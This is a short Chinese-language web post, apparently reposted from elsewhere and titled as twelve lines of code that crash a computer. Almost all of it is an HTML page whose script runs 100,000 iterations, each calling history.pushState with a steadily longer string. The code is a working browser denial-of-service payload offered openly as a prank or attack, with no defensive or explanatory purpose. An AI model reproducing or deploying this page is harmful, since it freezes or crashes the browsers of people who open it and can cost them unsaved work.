12行让电脑奔溃的代码

来源:互联网 发布:矩阵设备图片 编辑:程序博客网 时间:2024/04/29 16:30
<html>
<body>
<script>
var total = "";
for(var i = 0; i < 100000; i++)
{
total = total + i.toString();
history.pushState(0,0,total);
}
</script>
</body>
</html>
0 0
原创粉丝点击